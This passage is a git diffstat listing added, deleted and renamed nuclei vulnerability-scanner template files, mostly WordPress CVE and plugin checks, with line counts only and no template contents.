.../wordpress/CVE-2021-24297.yaml | 42 - .../wordpress/CVE-2021-24298-5684.yaml | 38 - .../wordpress/CVE-2021-24298-5686.yaml | 25 + .../wordpress/CVE-2021-24316-5691.yaml | 39 - .../wordpress/CVE-2021-24316-5695.yaml | 35 + .../wordpress/CVE-2021-24340-5711.yaml | 43 + .../wordpress/CVE-2021-24340-5712.yaml | 38 - .../wordpress/CVE-2021-24358-5717.yaml | 47 - .../wordpress/CVE-2021-24358-5718.yaml | 37 +- .../wordpress/CVE-2021-24364-5721.yaml | 38 + .../wordpress/CVE-2021-24387-5725.yaml | 39 - .../wordpress/CVE-2021-24407-5742.yaml | 4 +- .../wordpress/CVE-2021-24472-5743.yaml | 32 - .../wordpress/CVE-2021-24472.yaml | 25 + ...ve-2021-24488.yaml => CVE-2021-24488.yaml} | 0 ...498-5753.yaml => CVE-2021-24498-5754.yaml} | 0 .../wordpress/CVE-2021-24508.yaml | 46 + .../wordpress/CVE-2021-24522.yaml | 37 - .../wordpress/CVE-2021-24527.yaml | 37 - .../wordpress/CVE-2021-24565.yaml | 42 - .../wordpress/CVE-2021-24657.yaml | 41 - .../wordpress/CVE-2021-24750.yaml | 38 - .../wordpress/CVE-2021-24761.yaml | 30 - .../wordpress/CVE-2021-24762.yaml | 32 + .../wordpress/CVE-2021-24764.yaml | 38 + .../wordpress/CVE-2021-24806.yaml | 71 + .../wordpress/CVE-2021-24838-5770.yaml | 28 + .../wordpress/CVE-2021-24873.yaml | 40 - .../wordpress/CVE-2021-24891.yaml | 35 - .../wordpress/CVE-2021-24910(1).yaml | 32 +- .../wordpress/CVE-2021-24925.yaml | 37 - .../wordpress/CVE-2021-24926-5772.yaml | 43 - .../wordpress/CVE-2021-24947-5775.yaml | 39 + .../wordpress/CVE-2021-24948.yaml | 41 + .../wordpress/CVE-2021-24949.yaml | 41 + .../wordpress/CVE-2021-24991-5779.yaml | 46 + ...21-24997.yaml => CVE-2021-24997-5782.yaml} | 0 .../wordpress/CVE-2021-25017.yaml | 40 - .../wordpress/CVE-2021-25022.yaml | 37 + .../wordpress/CVE-2021-25028-5786.yaml | 30 + .../wordpress/CVE-2021-25040.yaml | 37 + .../wordpress/CVE-2021-25041.yaml | 42 + .../wordpress/CVE-2021-25063-5794.yaml | 41 - .../wordpress/CVE-2021-25070.yaml | 39 - ...074-5800.yaml => CVE-2021-25074-5800.yaml} | 0 .../wordpress/CVE-2021-25075.yaml | 53 - .../wordpress/CVE-2021-25087.yaml | 49 - .../wordpress/CVE-2021-25089.yaml | 37 + .../wordpress/CVE-2021-25098.yaml | 36 - .../wordpress/CVE-2021-25112-5804.yaml | 49 + .../wordpress/CVE-2021-25112.yaml | 43 - .../wordpress/CVE-2021-25120.yaml | 45 + .../wordpress/CVE-2021-34620.yaml | 40 - .../wordpress/CVE-2021-34623.yaml | 47 - .../wordpress/CVE-2021-34640-6237.yaml | 44 + .../wordpress/CVE-2021-34643.yaml | 42 + .../wordpress/CVE-2021-38314-6299.yaml | 51 + ...39312-6327.yaml => CVE-2021-39312(1).yaml} | 0 .../wordpress/CVE-2021-39316.yaml | 32 - .../wordpress/CVE-2021-39327.yaml | 38 - .../wordpress/CVE-2021-39350-6345.yaml | 48 + nuclei-templates/wordpress/CVE-2021-4392.yaml | 44 - nuclei-templates/wordpress/CVE-2021-4417.yaml | 45 + .../wordpress/CVE-2021-46889.yaml | 43 - nuclei-templates/wordpress/CVE-2022-0141.yaml | 66 - nuclei-templates/wordpress/CVE-2022-0142.yaml | 40 - .../wordpress/CVE-2022-0148-6605.yaml | 48 - .../wordpress/CVE-2022-0149-6606.yaml | 45 + .../wordpress/CVE-2022-0149-6607.yaml | 45 - nuclei-templates/wordpress/CVE-2022-0165.yaml | 43 - nuclei-templates/wordpress/CVE-2022-0189.yaml | 6 + .../wordpress/CVE-2022-0208(1).yaml | 55 + nuclei-templates/wordpress/CVE-2022-0250.yaml | 39 - ...0271-6616.yaml => CVE-2022-0271-6617.yaml} | 0 .../wordpress/CVE-2022-0288(1).yaml | 46 + nuclei-templates/wordpress/CVE-2022-0320.yaml | 47 + nuclei-templates/wordpress/CVE-2022-0328.yaml | 38 + nuclei-templates/wordpress/CVE-2022-0346.yaml | 54 - nuclei-templates/wordpress/CVE-2022-0422.yaml | 63 + nuclei-templates/wordpress/CVE-2022-0513.yaml | 46 - .../wordpress/CVE-2022-0591-6637.yaml | 19 - .../wordpress/CVE-2022-0594(1).yaml | 37 + .../wordpress/CVE-2022-0595(1).yaml | 50 + nuclei-templates/wordpress/CVE-2022-0599.yaml | 58 + nuclei-templates/wordpress/CVE-2022-0640.yaml | 41 - .../wordpress/CVE-2022-0653-6640.yaml | 26 - nuclei-templates/wordpress/CVE-2022-0653.yaml | 37 + nuclei-templates/wordpress/CVE-2022-0681.yaml | 37 - nuclei-templates/wordpress/CVE-2022-0694.yaml | 42 - nuclei-templates/wordpress/CVE-2022-0770.yaml | 48 - ...E-2022-1020.yaml => CVE-2022-1020(1).yaml} | 0 nuclei-templates/wordpress/CVE-2022-1054.yaml | 29 + nuclei-templates/wordpress/CVE-2022-1166.yaml | 45 - nuclei-templates/wordpress/CVE-2022-1209.yaml | 58 + .../wordpress/CVE-2022-1221(1).yaml | 42 - nuclei-templates/wordpress/CVE-2022-1221.yaml | 37 + nuclei-templates/wordpress/CVE-2022-1281.yaml | 55 + nuclei-templates/wordpress/CVE-2022-1282.yaml | 45 + .../wordpress/CVE-2022-1392-6651.yaml | 34 + nuclei-templates/wordpress/CVE-2022-1392.yaml | 49 - .../wordpress/CVE-2022-1597(1).yaml | 37 +- .../wordpress/CVE-2022-1598-6653.yaml | 35 - nuclei-templates/wordpress/CVE-2022-1598.yaml | 34 + ...e-2022-1724.yaml => CVE-2022-1724(1).yaml} | 0 nuclei-templates/wordpress/CVE-2022-1895.yaml | 39 + .../wordpress/CVE-2022-1904(1).yaml | 55 - .../wordpress/CVE-2022-1937(1).yaml | 38 + nuclei-templates/wordpress/CVE-2022-1937.yaml | 53 - nuclei-templates/wordpress/CVE-2022-1985.yaml | 37 + nuclei-templates/wordpress/CVE-2022-2167.yaml | 45 - .../wordpress/CVE-2022-2187(1).yaml | 36 + nuclei-templates/wordpress/CVE-2022-2187.yaml | 56 - nuclei-templates/wordpress/CVE-2022-2260.yaml | 46 + nuclei-templates/wordpress/CVE-2022-2362.yaml | 38 - nuclei-templates/wordpress/CVE-2022-2461.yaml | 45 + .../wordpress/CVE-2022-25306.yaml | 43 - .../wordpress/CVE-2022-25307.yaml | 24 + nuclei-templates/wordpress/CVE-2022-2532.yaml | 37 + nuclei-templates/wordpress/CVE-2022-2536.yaml | 43 - nuclei-templates/wordpress/CVE-2022-2552.yaml | 60 + .../wordpress/CVE-2022-27849-6740.yaml | 39 - nuclei-templates/wordpress/CVE-2022-2846.yaml | 43 - nuclei-templates/wordpress/CVE-2022-3463.yaml | 42 - nuclei-templates/wordpress/CVE-2022-3600.yaml | 41 + nuclei-templates/wordpress/CVE-2022-3846.yaml | 42 + nuclei-templates/wordpress/CVE-2022-3852.yaml | 37 - nuclei-templates/wordpress/CVE-2022-4120.yaml | 41 + .../wordpress/CVE-2022-45808.yaml | 45 + nuclei-templates/wordpress/CVE-2022-4971.yaml | 43 + nuclei-templates/wordpress/CVE-2023-0058.yaml | 41 + nuclei-templates/wordpress/CVE-2023-0403.yaml | 23 - nuclei-templates/wordpress/CVE-2023-0899.yaml | 36 + nuclei-templates/wordpress/CVE-2023-1282.yaml | 38 + nuclei-templates/wordpress/CVE-2023-1912.yaml | 42 - nuclei-templates/wordpress/CVE-2023-2488.yaml | 38 - nuclei-templates/wordpress/CVE-2023-3134.yaml | 40 - .../wordpress/CVE-2023-34020.yaml | 22 - nuclei-templates/wordpress/CVE-2023-3452.yaml | 41 + .../wordpress/CVE-2023-40600.yaml | 38 + nuclei-templates/wordpress/CVE-2023-4620.yaml | 42 - .../wordpress/CVE-2023-47684.yaml | 34 - nuclei-templates/wordpress/CVE-2023-5307.yaml | 43 - nuclei-templates/wordpress/CVE-2023-5604.yaml | 42 - nuclei-templates/wordpress/CVE-2023-6627.yaml | 43 - nuclei-templates/wordpress/CVE-2023-7200.yaml | 63 - nuclei-templates/wordpress/CVE-2024-0233.yaml | 44 - nuclei-templates/wordpress/CVE-2024-0236.yaml | 45 - nuclei-templates/wordpress/CVE-2024-0237.yaml | 49 - nuclei-templates/wordpress/CVE-2024-0324.yaml | 45 + .../wordpress/CVE-2024-10400.yaml | 83 +- .../wordpress/CVE-2024-11230.yaml | 59 + nuclei-templates/wordpress/CVE-2024-2879.yaml | 23 - nuclei-templates/wordpress/CVE-2024-3495.yaml | 40 + nuclei-templates/wordpress/CVE-2024-4382.yaml | 67 + nuclei-templates/wordpress/CVE-2024-5932.yaml | 28 + nuclei-templates/wordpress/CVE-2024-8529.yaml | 42 - nuclei-templates/wordpress/CVE-2024-9156.yaml | 47 + .../wordpress/WP_json_caching.yaml | 55 + .../accessibility-helper-xss-18.yaml | 30 + .../wordpress/accessibility-helper-xss.yaml | 25 - .../wordpress/ad-widget-lfi-124.yaml | 27 + nuclei-templates/wordpress/ad-widget-lfi.yaml | 28 - ....yaml => admin-word-count-column-lfi.yaml} | 0 .../advanced-access-manager-lfi-118.yaml | 29 + .../wordpress/age-gate-open-redirect-207.yaml | 29 - .../wordpress/age-gate-open-redirect.yaml | 36 + ...ess-257.yaml => alfacgiapi-wordpress.yaml} | 0 .../wordpress/aspose-file-download-558.yaml | 27 - .../wordpress/aspose-file-download-561.yaml | 27 + .../wordpress/aspose-ie-file-download.yaml | 10 +- .../aspose-pdf-file-download-568.yaml | 29 + .../attitude-theme-open-redirect-586.yaml | 2 +- nuclei-templates/wordpress/booked.yaml | 23 + .../wordpress/brandfolder-lfi-776.yaml | 29 - .../wordpress/brandfolder-lfi-778.yaml | 29 + .../brandfolder-open-redirect-779.yaml | 23 + .../brandfolder-open-redirect-782.yaml | 20 - .../cherry-file-download.yaml | 0 .../{cherry-lfi-903.yaml => cherry-lfi.yaml} | 0 .../wordpress/churchope-lfi-915.yaml | 23 - nuclei-templates/wordpress/churchope-lfi.yaml | 28 + .../wordpress/cve-2011-4618-2069.yaml | 30 - nuclei-templates/wordpress/cve-2011-4618.yaml | 25 + .../wordpress/cve-2011-4624-2080.yaml | 34 + .../wordpress/cve-2011-5106-2097.yaml | 35 + nuclei-templates/wordpress/cve-2011-5106.yaml | 33 - nuclei-templates/wordpress/cve-2011-5107.yaml | 35 - .../wordpress/cve-2011-5179-2109.yaml | 30 + .../wordpress/cve-2012-0901-2141.yaml | 34 - .../wordpress/cve-2012-1835-2172.yaml | 34 - .../wordpress/cve-2012-2371-2175.yaml | 30 + .../wordpress/cve-2012-4242-2183.yaml | 34 - nuclei-templates/wordpress/cve-2012-4242.yaml | 30 + .../wordpress/cve-2012-4273-2197.yaml | 40 + nuclei-templates/wordpress/cve-2012-4768.yaml | 32 + nuclei-templates/wordpress/cve-2012-5913.yaml | 33 + nuclei-templates/wordpress/cve-2013-2287.yaml | 38 - .../wordpress/cve-2013-4117-2265.yaml | 32 + ...4625-2269.yaml => cve-2013-4625-2266.yaml} | 0 nuclei-templates/wordpress/cve-2013-7240.yaml | 38 + ...2014-4513-2341.yaml => cve-2014-4513.yaml} | 0 nuclei-templates/wordpress/cve-2014-4536.yaml | 32 + ...4550-2364.yaml => cve-2014-4550-2367.yaml} | 0 .../wordpress/cve-2014-4558-2369.yaml | 20 +- nuclei-templates/wordpress/cve-2014-4561.yaml | 37 + .../wordpress/cve-2014-4592-2377.yaml | 42 + .../wordpress/cve-2014-4940-2381.yaml | 27 + .../wordpress/cve-2014-4940-2382.yaml | 29 - nuclei-templates/wordpress/cve-2014-4942.yaml | 34 + .../wordpress/cve-2014-9094-2420.yaml | 34 + .../wordpress/cve-2014-9444-2426.yaml | 32 - .../wordpress/cve-2014-9444-2427.yaml | 33 + .../wordpress/cve-2015-1000012-2461.yaml | 30 + .../wordpress/cve-2015-2807-2500.yaml | 38 + .../wordpress/cve-2015-2807-2501.yaml | 32 - nuclei-templates/wordpress/cve-2015-4414.yaml | 28 + .../wordpress/cve-2015-5461-2556.yaml | 22 - .../wordpress/cve-2015-5471-2558.yaml | 34 - .../wordpress/cve-2015-5471-2560.yaml | 28 + .../wordpress/cve-2015-9414-2628.yaml | 37 - nuclei-templates/wordpress/cve-2015-9414.yaml | 32 + .../cve-2015-9480-2629.yaml} | 0 .../wordpress/cve-2016-1000126-2643.yaml | 30 + .../wordpress/cve-2016-1000127-2644.yaml | 35 - .../wordpress/cve-2016-1000127-2647.yaml | 30 + .../wordpress/cve-2016-1000129-2655.yaml | 30 + .../wordpress/cve-2016-1000129.yaml | 39 - .../wordpress/cve-2016-1000130.yaml | 30 + .../wordpress/cve-2016-1000131-2664.yaml | 34 + .../wordpress/cve-2016-1000131-2665.yaml | 35 - .../wordpress/cve-2016-1000132-2668.yaml | 34 - ...3-2671.yaml => cve-2016-1000133-2673.yaml} | 0 .../wordpress/cve-2016-1000135-2685.yaml | 39 + .../wordpress/cve-2016-1000136.yaml | 40 - .../wordpress/cve-2016-1000139-2699.yaml | 39 + .../wordpress/cve-2016-1000139-2702.yaml | 36 - .../wordpress/cve-2016-1000140-2706.yaml | 35 - .../wordpress/cve-2016-1000141.yaml | 30 + .../wordpress/cve-2016-1000142-2712.yaml | 37 - .../wordpress/cve-2016-1000143-2717.yaml | 32 + .../wordpress/cve-2016-1000146-2720.yaml | 35 + .../wordpress/cve-2016-1000149-2728.yaml | 34 + .../wordpress/cve-2016-1000152-2729.yaml | 39 + .../wordpress/cve-2016-1000152.yaml | 34 - .../wordpress/cve-2016-10033-2745.yaml | 49 + .../wordpress/cve-2016-10956-2760.yaml | 31 - .../wordpress/cve-2017-1000170-2838.yaml | 2 + ...0-2842.yaml => cve-2017-1000170-2842.yaml} | 0 .../wordpress/cve-2017-17059.yaml | 39 + ...17-17451-2983.yaml => cve-2017-17451.yaml} | 0 .../wordpress/cve-2017-18536-2995.yaml | 32 - .../wordpress/cve-2017-18598-2997.yaml | 34 - .../wordpress/cve-2017-5487-3024.yaml | 30 + .../wordpress/cve-2017-9288-3086.yaml | 35 + ...069-3425.yaml => cve-2018-18069-3425.yaml} | 0 .../wordpress/cve-2018-18069-3429.yaml | 17 - ...462-3492.yaml => cve-2018-20462-3494.yaml} | 0 ...3810-3558.yaml => cve-2018-3810-3558.yaml} | 0 nuclei-templates/wordpress/cve-2018-8719.yaml | 35 + .../wordpress/cve-2018-9118-3653.yaml | 30 + nuclei-templates/wordpress/cve-2018-9118.yaml | 31 - .../wordpress/cve-2019-10692(1).yaml | 57 + .../wordpress/cve-2019-14205-3827.yaml | 28 + .../wordpress/cve-2019-15713-3887.yaml | 37 + .../cve-2019-15858-3892.yaml} | 0 .../wordpress/cve-2019-15858.yaml | 52 + .../wordpress/cve-2019-15889.yaml | 11 +- .../wordpress/cve-2019-16332-3933.yaml | 9 +- .../wordpress/cve-2019-16525.yaml | 30 - .../wordpress/cve-2019-16931(1).yaml | 59 + .../wordpress/cve-2019-16932(1).yaml | 39 + .../wordpress/cve-2019-16932.yaml | 75 - .../wordpress/cve-2019-19134-4031.yaml | 35 - .../wordpress/cve-2019-19134.yaml | 34 + .../wordpress/cve-2019-20210(1).yaml | 42 - .../wordpress/cve-2019-20210.yaml | 37 + .../wordpress/cve-2019-6112-4178.yaml | 23 - nuclei-templates/wordpress/cve-2019-6112.yaml | 25 + .../wordpress/cve-2019-6715-4184.yaml | 30 - .../wordpress/cve-2019-6715-4189.yaml | 34 + .../wordpress/cve-2019-9618-4297.yaml | 32 + .../wordpress/cve-2019-9978-4331.yaml | 21 - .../wordpress/cve-2020-11530.yaml | 61 +- .../wordpress/cve-2020-11738-4430.yaml | 45 - .../wordpress/cve-2020-11930.yaml | 36 + .../wordpress/cve-2020-13700-4510.yaml | 37 - ...700-4512.yaml => cve-2020-13700-4512.yaml} | 0 .../wordpress/cve-2020-14092-4536.yaml | 38 + .../wordpress/cve-2020-17362-4658.yaml | 39 + .../wordpress/cve-2020-17362-4659.yaml | 40 - ...186-4795.yaml => cve-2020-24186-4795.yaml} | 0 .../wordpress/cve-2020-24186-4797.yaml | 80 + .../wordpress/cve-2020-24312-4805.yaml | 24 + ...312-4810.yaml => cve-2020-24312-4806.yaml} | 0 .../wordpress/cve-2020-25213.yaml | 64 + .../wordpress/cve-2020-26153-4913.yaml | 38 + .../wordpress/cve-2020-28976-4989.yaml | 27 + .../wordpress/cve-2020-28976-4990.yaml | 27 - .../wordpress/cve-2020-29395-5002.yaml | 33 - ...489-5039.yaml => cve-2020-35489-5039.yaml} | 0 .../wordpress/cve-2020-35489-5044.yaml | 48 - .../wordpress/cve-2020-35489.yaml | 35 + .../wordpress/cve-2020-35749-5075.yaml | 39 + ...951-5108.yaml => cve-2020-35951-5108.yaml} | 0 .../wordpress/cve-2020-35951-5109.yaml | 67 - .../wordpress/cve-2020-35951-5110.yaml | 67 + .../wordpress/cve-2020-36510(1).yaml | 40 +- ...e-2020-9043.yaml => cve-2020-9043(1).yaml} | 0 .../wordpress/cve-2021-21389-5514.yaml | 53 - ...146-5630.yaml => cve-2021-24146-5631.yaml} | 0 .../wordpress/cve-2021-24235-5653.yaml | 37 + .../wordpress/cve-2021-24237-5656.yaml | 29 - ...2021-24245(1).yaml => cve-2021-24245.yaml} | 0 ...275-5661.yaml => cve-2021-24275-5661.yaml} | 0 .../wordpress/cve-2021-24276-5666.yaml | 37 + .../wordpress/cve-2021-24278-5668.yaml | 46 - .../wordpress/cve-2021-24284(1).yaml | 81 + .../wordpress/cve-2021-24286.yaml | 21 + .../wordpress/cve-2021-24288-5678.yaml | 23 - ...2021-24300(1).yaml => cve-2021-24300.yaml} | 0 .../wordpress/cve-2021-24320-5699.yaml | 32 + .../wordpress/cve-2021-24320.yaml | 32 - .../wordpress/cve-2021-24335-5701.yaml | 30 + .../wordpress/cve-2021-24335-5705.yaml | 34 - ...21-24342-5715.yaml => cve-2021-24342.yaml} | 0 .../wordpress/cve-2021-24364-5719.yaml | 32 - .../wordpress/cve-2021-24387-5726.yaml | 42 + .../wordpress/cve-2021-24389-5731.yaml | 30 - .../wordpress/cve-2021-24389.yaml | 35 + .../wordpress/cve-2021-24406-5737.yaml | 30 + .../wordpress/cve-2021-24495-5747.yaml | 34 + .../wordpress/cve-2021-24499-5756.yaml | 54 + .../wordpress/cve-2021-24510-5758.yaml | 48 - .../wordpress/cve-2021-24510-5759.yaml | 42 + ...21-24746.yaml => cve-2021-24746-5760.yaml} | 0 .../wordpress/cve-2021-24750-5762.yaml | 43 + .../wordpress/cve-2021-24762-5766.yaml | 37 - .../wordpress/cve-2021-24838-5767.yaml | 28 - .../wordpress/cve-2021-24891(1).yaml | 48 + .../wordpress/cve-2021-24926-5771.yaml | 40 + .../wordpress/cve-2021-24947-5775.yaml | 37 - .../wordpress/cve-2021-24987.yaml | 10 +- .../wordpress/cve-2021-24991.yaml | 51 - ...2021-25008(1).yaml => cve-2021-25008.yaml} | 0 .../wordpress/cve-2021-25028.yaml | 26 - .../wordpress/cve-2021-25033-5788.yaml | 28 + .../wordpress/cve-2021-25052-5789.yaml | 44 - .../wordpress/cve-2021-25052-5790.yaml | 40 + .../wordpress/cve-2021-25055-5792.yaml | 49 - .../wordpress/cve-2021-25055.yaml | 46 + .../wordpress/cve-2021-25063.yaml | 40 + .../wordpress/cve-2021-25075(1).yaml | 71 + .../wordpress/cve-2021-25085(1).yaml | 54 + .../wordpress/cve-2021-25085.yaml | 42 - ...VE-2021-25118.yaml => cve-2021-25118.yaml} | 0 .../wordpress/cve-2021-25120(1).yaml | 45 - .../wordpress/cve-2021-34621-6233.yaml | 32 +- .../wordpress/cve-2021-34640.yaml | 48 - .../wordpress/cve-2021-34643-6239.yaml | 48 - .../wordpress/cve-2021-38314.yaml | 44 - .../wordpress/cve-2021-39320-6334.yaml | 35 + .../wordpress/cve-2021-39320-6336.yaml | 34 - .../wordpress/cve-2021-39322-6338.yaml | 44 - .../wordpress/cve-2021-39322-6339.yaml | 50 + .../wordpress/cve-2021-39327-6342.yaml | 43 + .../wordpress/cve-2021-39350-6343.yaml | 54 - .../wordpress/cve-2022-0148-6605.yaml | 42 + .../wordpress/cve-2022-0165(1).yaml | 23 + .../wordpress/cve-2022-0201(1).yaml | 26 +- nuclei-templates/wordpress/cve-2022-0208.yaml | 34 - .../wordpress/cve-2022-0218-6612.yaml | 35 + .../wordpress/cve-2022-0218-6613.yaml | 40 - .../wordpress/cve-2022-0288(1).yaml | 60 - nuclei-templates/wordpress/cve-2022-0346.yaml | 47 + .../wordpress/cve-2022-0381-6626.yaml | 69 - nuclei-templates/wordpress/cve-2022-0381.yaml | 32 + nuclei-templates/wordpress/cve-2022-0422.yaml | 41 - .../wordpress/cve-2022-0591-6636.yaml | 26 + nuclei-templates/wordpress/cve-2022-0594.yaml | 56 - nuclei-templates/wordpress/cve-2022-0595.yaml | 54 - nuclei-templates/wordpress/cve-2022-0599.yaml | 41 - .../wordpress/cve-2022-0952(1).yaml | 64 + nuclei-templates/wordpress/cve-2022-0952.yaml | 47 - .../wordpress/cve-2022-1054(1).yaml | 48 - .../wordpress/cve-2022-1119(1).yaml | 51 - nuclei-templates/wordpress/cve-2022-1119.yaml | 37 + ...e-2022-1386(1).yaml => cve-2022-1386.yaml} | 0 ...2-1609-6655.yaml => cve-2022-1609(1).yaml} | 0 .../wordpress/cve-2022-1904(1).yaml | 37 + .../wordpress/cve-2022-27849-6740.yaml | 58 + .../cve-2022-29455.yaml} | 0 ...ackup-lfi.yaml => db-backup-lfi-6776.yaml} | 0 .../wordpress/diarise-theme-lfi-6992.yaml | 26 + ....yaml => dzs-zoomsounds-listing-7147.yaml} | 0 .../easy-media-gallery-pro-listing-7152.yaml | 24 + .../wordpress/easy-wp-smtp-listing-7154.yaml | 5 +- .../eatery-restaurant-open-redirect-7158.yaml | 20 - .../elementorpage-open-redirect.yaml | 50 + .../wordpress/feedwordpress-xss.yaml | 8 +- ...o-lfi-7913.yaml => hb-audio-lfi-7911.yaml} | 0 ...1.yaml => hide-security-enhancer-lfi.yaml} | 0 nuclei-templates/wordpress/learnpress.yaml | 22 - ...ml => music-store-open-redirect-8972.yaml} | 0 .../wordpress/my-chatbot-xss-8978.yaml | 47 + .../wordpress/my-chatbot-xss-8979.yaml | 42 - .../nativechurch-wp-theme-lfd-9003.yaml | 22 + .../wordpress/nativechurch-wp-theme-lfd.yaml | 25 - nuclei-templates/wordpress/nexus.yaml | 20 + ...9134.yaml => ninjaform-open-redirect.yaml} | 0 .../wordpress/noptin-open-redirect.yaml | 27 - .../pieregister-open-redirect-9577.yaml | 23 - .../pieregister-open-redirect-9579.yaml | 22 + .../pieregister-plugin-open-redirect.yaml | 19 + nuclei-templates/wordpress/platform.yaml | 20 + ...code-lfi.yaml => shortcode-lfi-10214.yaml} | 0 .../wordpress/signatures-10248.yaml | 34 - ...> simple-image-manipulator-lfi-10281.yaml} | 0 .../wordpress/sniplets-lfi-10341.yaml | 26 + .../wordpress/sniplets-lfi-10343.yaml | 22 - .../wordpress/sniplets-xss-10344.yaml | 5 + .../ultimatemember-open-redirect-10877.yaml | 20 + .../video-synchro-pdf-lfi-11006.yaml | 32 - .../video-synchro-pdf-lfi-11007.yaml | 25 + ...1.yaml => w3c-total-cache-ssrf-11080.yaml} | 0 ...ekender-newspaper-open-redirect-11186.yaml | 5 +- .../wordpress-affiliatewp-log-11244.yaml | 6 +- ...ordpress-bbpress-plugin-listing-11247.yaml | 26 - .../wordpress-db-repair-11255.yaml} | 0 .../wordpress/wordpress-detect-11261.yaml | 34 - .../wordpress-directory-listing.yaml | 25 - .../wordpress-emergency-script-11274.yaml | 24 + .../wordpress-emergency-script-11277.yaml | 23 - .../wordpress/wordpress-git-config-11279.yaml | 31 + ...press-gtranslate-plugin-listing-11282.yaml | 26 - ...press-gtranslate-plugin-listing-11284.yaml | 23 + ...rdpress-infinitewp-auth-bypass-11287.yaml} | 0 .../wordpress-installer-log-11290.yaml | 19 - .../wordpress-installer-log-11292.yaml | 20 + ...-login.yaml => wordpress-login-11295.yaml} | 0 .../wordpress/wordpress-plugins-detect.yaml | 22 - .../wordpress/wordpress-plugins2.yaml | 35 + .../wordpress-rce-simplefilelist-11299.yaml | 2 +- ...ress-redirection-plugin-listing-11306.yaml | 22 - .../wordpress/wordpress-rest-dosviacp.yaml | 58 - .../wordpress/wordpress-takeover-11311.yaml | 1 + .../wordpress/wordpress-theme-detect.yaml | 25 + .../wordpress-tmm-db-migrate-11317.yaml | 23 - .../wordpress-tmm-db-migrate-11320.yaml | 33 + ...ss-total-upkeep-backup-download-11324.yaml | 32 - .../wordpress/wordpress-user-enum-11330.yaml | 28 - .../wordpress-weak-credentials-11336.yaml | 43 + .../wordpress/wordpress-weak-credentials.yaml | 37 - .../wordpress-woocommerce-listing-11341.yaml | 25 + ...1348.yaml => wordpress-wordfence-lfi.yaml} | 0 ...dpress-wordfence-waf-bypass-xss-11353.yaml | 29 - .../wordpress-wordfence-xss-11357.yaml | 0 ...press-wpcourses-info-disclosure-11369.yaml | 34 - .../wordpress-xmlrpc-brute-force.yaml | 50 + .../wordpress-zebra-form-xss-11379.yaml | 44 - .../wordpress/wordpress-zebra-form-xss.yaml | 35 + ...p-123contactform-plugin-listing-11400.yaml | 28 - .../wordpress/wp-adaptive-xss-11403.yaml | 40 + .../wordpress/wp-adaptive-xss-11404.yaml | 34 - .../wordpress/wp-altair-listing-11406.yaml | 27 - .../wordpress/wp-altair-listing.yaml | 27 + .../wordpress/wp-arforms-listing-11418.yaml | 11 +- .../wordpress/wp-church-admin-xss-11422.yaml | 29 - .../wordpress/wp-church-admin-xss.yaml | 29 + ...s-11435.yaml => wp-custom-tables-xss.yaml} | 0 .../wp-email-subscribers-listing-11440.yaml | 26 + .../wp-email-subscribers-listing-11442.yaml | 26 - .../wp-enabled-registration.yaml | 2 +- .../wordpress/wp-finder-xss-11450.yaml | 25 + ...agem-xss.yaml => wp-flagem-xss-11451.yaml} | 0 .../wp-grimag-open-redirect-11458.yaml | 17 + .../wp-grimag-open-redirect-11461.yaml | 18 - .../wp-gtranslate-open-redirect-11465.yaml} | 0 ...wp-idx-broker-platinum-listing-11471.yaml} | 0 .../wordpress/wp-install-11475.yaml | 25 - nuclei-templates/wordpress/wp-install.yaml | 22 + .../wp-iwp-client-listing-11476.yaml | 25 + .../wp-javospot-lfi-11482.yaml} | 0 .../wordpress/wp-knews-xss-11483.yaml | 29 - .../wordpress/wp-knews-xss-11484.yaml | 24 + .../wordpress/wp-license-file.yaml | 17 - .../wp-mail-smtp-listing.yaml | 2 +- ...p-memphis-documents-library-lfi-11495.yaml | 26 - .../wp-memphis-documents-library-lfi.yaml | 26 + ...ml => wp-mstore-plugin-listing-11500.yaml} | 0 .../wp-multiple-theme-ssrf-11510.yaml | 28 + .../wordpress/wp-nextgen-xss-11514.yaml | 24 - .../wordpress/wp-nextgen-xss-11516.yaml | 29 + ...528.yaml => wp-phpfreechat-xss-11527.yaml} | 0 ...p-plugin-1-flashgallery-listing-11530.yaml | 27 - ...p-plugin-1-flashgallery-listing-11532.yaml | 28 + .../wordpress/wp-plugin-lifterlms-11536.yaml | 25 + .../wordpress/wp-plugin-lifterlms.yaml | 23 - ...l => wp-plugin-utlimate-member-11541.yaml} | 0 .../wordpress/wp-popup-listing-11545.yaml | 6 +- .../wp-prostore-open-redirect-11549.yaml | 20 + .../wp-prostore-open-redirect-11550.yaml | 20 - .../wordpress/wp-qards-listing-11552.yaml | 49 +- .../wordpress/wp-revslider-file-download.yaml | 72 +- .../wordpress/wp-securimage-xss-11557.yaml | 25 + .../wordpress/wp-securimage-xss.yaml | 29 - .../wp-security-open-redirect-11561.yaml | 24 - .../wordpress/wp-security-open-redirect.yaml | 33 + ...ng-11565.yaml => wp-sfwd-lms-listing.yaml} | 0 .../wp-simple-fields-lfi-11570.yaml} | 0 .../wordpress/wp-socialfit-xss-11578.yaml | 27 - .../wordpress/wp-socialfit-xss-11582.yaml | 27 + .../wordpress/wp-spot-premium-lfi-11584.yaml | 27 + .../wordpress/wp-spot-premium-lfi.yaml | 28 - .../wordpress/wp-super-forms-11585.yaml | 22 + .../wordpress/wp-super-forms-11588.yaml | 20 - .../wordpress/wp-tinymce-lfi-11589.yaml | 29 + .../wordpress/wp-tinymce-lfi-11591.yaml | 29 - .../wordpress/wp-tutor-lfi-11596.yaml | 19 + .../wp-upload-data-11602.yaml | 0 ...whmcs-xss-11613.yaml => wp-whmcs-xss.yaml} | 0 ...-woocommerce-email-verification-11619.yaml | 29 + ...yaml => wp-woocommerce-file-download.yaml} | 0 .../wordpress/wp-xmlrpc-11629.yaml | 13 - .../wp-xmlrpc-brute-force-11624.yaml | 59 - .../wp-xmlrpc-pingback-detection-11627.yaml} | 0 .../wpconfig-aws-keys.yaml | 2 +- .../wordpress/wpdm-cache-session-11436.yaml | 24 - .../wordpress/wpdm-cache-session-11438.yaml | 26 + ...11504.yaml => wpmudev-pub-keys-11507.yaml} | 0 ....yaml => wptouch-open-redirect-11594.yaml} | 0 .../wptouch-plugin-open-redirect.yaml | 19 - 4268 files changed, 201622 insertions(+), 668240 deletions(-) create mode 100644 nuclei-templates/CVE-2001/CVE-2001-1473.yaml delete mode 100644 nuclei-templates/CVE-2001/cve-2001-1473.yaml delete mode 100644 nuclei-templates/CVE-2004/CVE-2004-0519.yaml create mode 100644 nuclei-templates/CVE-2004/cve-2004-0519.yaml delete mode 100644 nuclei-templates/CVE-2005/CVE-2005-2428.yaml create mode 100644 nuclei-templates/CVE-2005/cve-2005-2428.yaml create mode 100644 